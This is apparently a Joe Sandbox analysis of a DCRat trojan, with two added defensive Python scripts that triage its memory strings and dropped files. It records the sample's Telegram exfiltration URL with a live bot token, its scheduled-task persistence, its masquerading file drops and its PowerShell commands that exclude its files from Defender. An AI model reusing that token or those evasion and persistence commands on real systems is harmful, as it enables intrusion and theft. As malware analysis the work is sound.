Source: powershell.exe, 00000022.00000002.2447636860.0000016462881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2450393544.0000019B542D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2439053732.0000024117FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2438216761.0000027736251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2433495607.0000019BADC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2446559445.000001E45C211000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000033F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: LzmJLVB41K.exe, 00000000.00000002.2309885143.00000000015A2000.00000002.00000001.01000000.00000000.sdmp, LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000033F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000033F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7520842495:AAGp6iR-yxPgcux3oLWODyICGAWeVDY-0VQ/sendPhotoX
Source: powershell.exe, 0000002B.00000002.3722297337.000001E46C287000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000002B.00000002.3722297337.000001E46C287000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000002B.00000002.3722297337.000001E46C287000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000002B.00000002.2446559445.000001E45C462000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000031BD000.00000004.00000800.00020000.00000000.sdmp, LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000037B0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ipinfo.io
Source: LzmJLVB41K.exe, 00000000.00000002.2309885143.00000000015A2000.00000002.00000001.01000000.00000000.sdmp, LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000031BD000.00000004.00000800.00020000.00000000.sdmp, LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000037B0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ipinfo.io/country
Source: LzmJLVB41K.exe, 00000000.00000002.2309885143.00000000015A2000.00000002.00000001.01000000.00000000.sdmp, LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000031BD000.00000004.00000800.00020000.00000000.sdmp, LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000037B0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ipinfo.io/ip
Source: powershell.exe, 00000022.00000002.3739159881.00000164728F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3784312347.0000019B64346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.3723381092.0000024128057000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.3741199181.00000277462C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.3637871775.0000019BBDC77000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.3722297337.000001E46C287000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown | HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49990 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49993 version: TLS 1.2
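The URL strings above mix the sample's own network indicators (a Telegram Bot API endpoint with the bot token embedded in the path, plus ipinfo.io lookups for the victim's public IP and country) with literals that PowerShell, PackageManagement and Pester carry in their own binaries on every run. The following Python script is an added example, not part of the Joe Sandbox report and not DCRat code: it classifies such memory strings, isolates and redacts the Telegram token, and drops the runtime noise so only the sample's indicators remain. The list of noise hosts is this example's own assumption; the sample URLs are copied verbatim from the indicators above, including the trailing character on sendPhotoX.

```python
"""Classify URL strings recovered from process memory.

Added example, not part of the Joe Sandbox report. SAMPLE_URLS is copied
from the "String found in binary or memory" indicators; the set of
runtime-noise hosts is this example's own assumption.
"""
import re
from urllib.parse import urlparse

# Literals that PowerShell, PackageManagement and Pester embed in their own
# binaries. Their presence in powershell.exe memory says nothing about the
# sample that launched PowerShell. (Assumption: tuned for this report.)
RUNTIME_NOISE_HOSTS = {
    "schemas.xmlsoap.org", "www.apache.org", "aka.ms",
    "contoso.com", "github.com", "nuget.org",
}

# Telegram Bot API path: /bot<numeric bot id>:<secret>/<method>
TELEGRAM_BOT_RE = re.compile(r"^/bot(\d+):([A-Za-z0-9_-]+)/?([A-Za-z]*)")


def classify_url(url):
    """Return (category, details) for one URL-looking memory string."""
    parsed = urlparse(url)
    host = parsed.netloc.lower()
    if host == "api.telegram.org":
        match = TELEGRAM_BOT_RE.match(parsed.path)
        if not match:
            # Bare host or ".../bot": a prefix the binary concatenates with
            # the token at runtime. Proof of intent, but no token to act on.
            return "c2_telegram_fragment", {}
        bot_id, secret, method = match.groups()
        return "c2_telegram", {
            "bot_id": bot_id,
            # Redacted form for sharing; the full token controls the bot.
            "token_redacted": f"{bot_id}:{secret[:4]}...",
            "method": method or None,
        }
    if host == "ipinfo.io":
        # Public IP / country lookup: victim geolocation before exfil.
        return "recon_geoip", {"endpoint": parsed.path or "/"}
    if host in RUNTIME_NOISE_HOSTS:
        return "runtime_noise", {}
    return "unknown", {}


def triage(urls):
    """Group URLs by category and drop the runtime noise."""
    groups = {}
    for url in urls:
        category, details = classify_url(url)
        if category != "runtime_noise":
            groups.setdefault(category, []).append((url, details))
    return groups


# Copied from the report's memory-string indicators.
SAMPLE_URLS = [
    "http://schemas.xmlsoap.org/wsdl/",
    "http://www.apache.org/licenses/LICENSE-2.0.html",
    "https://aka.ms/pscore68",
    "https://api.telegram.org",
    "https://api.telegram.org/bot",
    "https://api.telegram.org/bot7520842495:AAGp6iR-yxPgcux3oLWODyICGAWeVDY-0VQ/sendPhotoX",
    "https://contoso.com/License",
    "https://github.com/Pester/Pester",
    "https://ipinfo.io",
    "https://ipinfo.io/country",
    "https://ipinfo.io/ip",
    "https://nuget.org/nuget.exe",
]

if __name__ == "__main__":
    for category, hits in sorted(triage(SAMPLE_URLS).items()):
        print(category)
        for url, details in hits:
            print("   ", url, details or "")
```

The redacted token is the form that belongs in a shared report; the full token, which the sample carries in clear text, is enough to drive the bot and read what it receives, so treat the memory dump itself as sensitive.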
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File created: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File created: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe\:Zone.Identifier:$DATA
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File created: C:\Windows\Vss\Writers\Application\94dd0fcc3d3f01
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\CSC7E7B7A5EED54F4581A1AD8A9D40FA45.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File deleted: C:\Windows\System32\CSC7E7B7A5EED54F4581A1AD8A9D40FA45.TMP
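The drop locations in this report are chosen to blend in: fontdrvhost.exe and ctfmon.exe are genuine System32 binaries but are written to a Microsoft Office directory and to C:\Recovery, SecurityHealthSystray.exe lands in System32 itself but is written by csc.exe rather than by an installer, and the VSS writer directory receives an .exe together with an extensionless hex-named file. The following Python script is an added example, not part of the Joe Sandbox report: it applies three checks to (writer process, created path) pairs transcribed from the File created indicators here and further down. The table of expected directories and the trusted-writer list are deliberately small assumptions, not an inventory of Windows.

```python
"""Flag dropped files that masquerade as Windows binaries or land in system
directories via the wrong writer.

Added example, not part of the Joe Sandbox report. EVENTS is transcribed
from the report's "File created" indicators; EXPECTED_DIRS and
TRUSTED_WRITERS are small, deliberately incomplete assumptions.
"""
import ntpath
import re

# Lower-case system binary name -> directories (drive stripped) where the
# genuine file lives. Assumption: covers only the names this sample reuses.
EXPECTED_DIRS = {
    "fontdrvhost.exe": {"\\windows\\system32"},
    "ctfmon.exe": {"\\windows\\system32", "\\windows\\syswow64"},
    "securityhealthsystray.exe": {"\\windows\\system32"},
}

# Writers allowed to create files under Windows / Program Files.
# Assumption: a real allow-list is derived from the estate's installers.
TRUSTED_WRITERS = {
    "\\windows\\system32\\msiexec.exe",
    "\\windows\\system32\\svchost.exe",
    "\\windows\\system32\\tiworker.exe",
}

SYSTEM_ROOTS = ("\\windows\\", "\\program files\\", "\\program files (x86)\\")
# Joe Sandbox prints an alternate data stream as "<file>\:Zone.Identifier:$DATA".
ADS_RE = re.compile(r"\\?:[^\\:]+:\$data$")
HEX_NAME_RE = re.compile(r"^[0-9a-f]{8,}$")


def _normalize(path):
    """Drop the drive letter, lower-case, and strip any ADS suffix."""
    return ADS_RE.sub("", ntpath.splitdrive(path)[1].lower())


def check_drop(writer, path):
    """Return the list of findings for one file-creation event."""
    rel = _normalize(path)
    directory, name = ntpath.split(rel)
    writer_rel = _normalize(writer)
    findings = []

    expected = EXPECTED_DIRS.get(name)
    if expected and directory not in expected:
        findings.append(f"masquerade: {name} outside {sorted(expected)}")

    if rel.startswith(SYSTEM_ROOTS) and writer_rel not in TRUSTED_WRITERS:
        findings.append(f"untrusted writer to system dir: {ntpath.basename(writer_rel)}")

    stem, ext = ntpath.splitext(name)
    if not ext and HEX_NAME_RE.match(stem):
        # Extensionless, hex-named companion file beside the dropped binary,
        # as this report shows next to fozAQGvSmfTQIywuzSgk.exe.
        findings.append("extensionless hex-named file")
    return findings


def triage(events):
    """Map each normalized path to its findings; an ADS merges with its file."""
    report = {}
    for writer, path in events:
        findings = check_drop(writer, path)
        if findings:
            report.setdefault(_normalize(path), set()).update(findings)
    return report


DROPPER = r"C:\Users\user\Desktop\LzmJLVB41K.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
# Transcribed from the report; ctfmon.exe.0.dr is the dropper's copy in C:\Recovery.
EVENTS = [
    (DROPPER, r"C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe"),
    (DROPPER, r"C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe\:Zone.Identifier:$DATA"),
    (DROPPER, r"C:\Windows\Vss\Writers\Application\94dd0fcc3d3f01"),
    (CSC, r"c:\Windows\System32\SecurityHealthSystray.exe"),
    (DROPPER, r"C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"),
    (DROPPER, r"C:\Recovery\ctfmon.exe"),
    (DROPPER, r"C:\Users\user\Desktop\QMBYhgjh.log"),
]

if __name__ == "__main__":
    for path, findings in triage(EVENTS).items():
        print(path)
        for finding in sorted(findings):
            print("   ", finding)
```

The path-only masquerade rule cannot see SecurityHealthSystray.exe, because System32 is exactly where that name belongs; it is the writer rule that catches it, which is why file-creation telemetry needs the writing process and not just the path.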
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Code function: 0_2_00007FFD348C0D78
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Code function: 0_2_00007FFD348C1325
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Code function: 0_2_00007FFD34CBAF6E
Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe | Code function: 8_2_00007FFD348B0D78
Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe | Code function: 8_2_00007FFD348B1325
Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe | Code function: 9_2_00007FFD34891325
Source: C:\Recovery\ctfmon.exe | Code function: 22_2_00007FFD34881325
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Code function: 32_2_00007FFD348B1771
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Code function: 32_2_00007FFD34881325
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Code function: 32_2_00007FFD34890B16
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Code function: 32_2_00007FFD34890000
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Code function: 32_2_00007FFD348910A9
Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe | Code function: 51_2_00007FFD348A0D78
Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe | Code function: 51_2_00007FFD348A1325
Source: C:\Recovery\ctfmon.exe | Code function: 54_2_00007FFD348D1771
Source: C:\Recovery\ctfmon.exe | Code function: 54_2_00007FFD348A0D78
Source: C:\Recovery\ctfmon.exe | Code function: 54_2_00007FFD348A1325
Source: C:\Recovery\ctfmon.exe | Code function: 54_2_00007FFD348B0B16
Source: C:\Recovery\ctfmon.exe | Code function: 54_2_00007FFD348B0000
Source: C:\Recovery\ctfmon.exe | Code function: 54_2_00007FFD348B10A9
Source: C:\Recovery\ctfmon.exe | Code function: 54_2_00007FFD348B178E
Source: Joe Sandbox View | Dropped File: C:\Users\user\Desktop\KlfRTWYv.log 7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
Source: LzmJLVB41K.exe, 00000000.00000002.2309885143.00000000015A2000.00000002.00000001.01000000.00000000.sdmp | Binary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs LzmJLVB41K.exe
Source: LzmJLVB41K.exe, 00000000.00000000.2160562752.00000000009E2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs LzmJLVB41K.exe
Source: LzmJLVB41K.exe, 00000000.00000002.2390828260.000000001B99B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs LzmJLVB41K.exe
Source: LzmJLVB41K.exe, 00000000.00000002.2393161210.000000001C03C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs LzmJLVB41K.exe
Source: LzmJLVB41K.exe, 00000020.00000002.2827540581.0000000003070000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs LzmJLVB41K.exe
Source: LzmJLVB41K.exe, 00000020.00000002.2827540581.00000000030BE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs LzmJLVB41K.exe
Source: LzmJLVB41K.exe, 00000021.00000002.2832265084.000000000282E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs LzmJLVB41K.exe
Source: LzmJLVB41K.exe, 00000021.00000002.2832265084.00000000027E0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs LzmJLVB41K.exe
Source: LzmJLVB41K.exe, 00000021.00000002.2832265084.00000000028AC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs LzmJLVB41K.exe
Source: LzmJLVB41K.exe, 00000021.00000002.2832265084.00000000027F2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs LzmJLVB41K.exe
Source: LzmJLVB41K.exe | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs LzmJLVB41K.exe
Source: LzmJLVB41K.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: LzmJLVB41K.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: fontdrvhost.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: fozAQGvSmfTQIywuzSgk.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ctfmon.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: fozAQGvSmfTQIywuzSgk.exe0.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: LzmJLVB41K.exe, BsRfmRdfV3IS2HGBuC2.cs | Cryptographic APIs: 'CreateDecryptor'
Source: LzmJLVB41K.exe, BsRfmRdfV3IS2HGBuC2.cs | Cryptographic APIs: 'CreateDecryptor'
Source: LzmJLVB41K.exe, BsRfmRdfV3IS2HGBuC2.cs | Cryptographic APIs: 'CreateDecryptor'
Source: LzmJLVB41K.exe, BsRfmRdfV3IS2HGBuC2.cs | Cryptographic APIs: 'CreateDecryptor'
Source: classification engine | Classification label: mal100.spre.troj.expl.evad.winEXE@49/66@3/2
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File created: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File created: C:\Users\user\Desktop\QMBYhgjh.log
Source: C:\Recovery\ctfmon.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6520:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-aLGXjVx6R1ZoFPmWBKbs
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4600:120:WilError_03
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File created: C:\Users\user\AppData\Local\Temp\4zgfavxt
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Kg1DnkFEGg.bat"
Source: LzmJLVB41K.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: LzmJLVB41K.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: LzmJLVB41K.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | File read: C:\Users\user\Desktop\LzmJLVB41K.exe
Source: unknown | Process created: C:\Users\user\Desktop\LzmJLVB41K.exe "C:\Users\user\Desktop\LzmJLVB41K.exe"
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fozAQGvSmfTQIywuzSgkf" /sc MINUTE /mo 8 /tr "'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6584.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC80740084700441B098BDC166533478DB.TMP"
Source: unknown | Process created: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe C:\Recovery\fozAQGvSmfTQIywuzSgk.exe
Source: unknown | Process created: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe C:\Recovery\fozAQGvSmfTQIywuzSgk.exe
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a4ouxeif\a4ouxeif.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6A18.tmp" "c:\Windows\System32\CSC7E7B7A5EED54F4581A1AD8A9D40FA45.TMP"
Source: unknown | Process created: C:\Recovery\ctfmon.exe C:\Recovery\ctfmon.exe
Source: unknown | Process created: C:\Recovery\ctfmon.exe C:\Recovery\ctfmon.exe
Source: unknown | Process created: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
Source: unknown | Process created: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
Source: unknown | Process created: C:\Users\user\Desktop\LzmJLVB41K.exe C:\Users\user\Desktop\LzmJLVB41K.exe
Source: unknown | Process created: C:\Users\user\Desktop\LzmJLVB41K.exe C:\Users\user\Desktop\LzmJLVB41K.exe
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe'
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ctfmon.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe'
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\LzmJLVB41K.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LzmJLVB41K.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Kg1DnkFEGg.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown | Process created: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe "C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
Source: unknown | Process created: C:\Recovery\ctfmon.exe "C:\Recovery\ctfmon.exe"
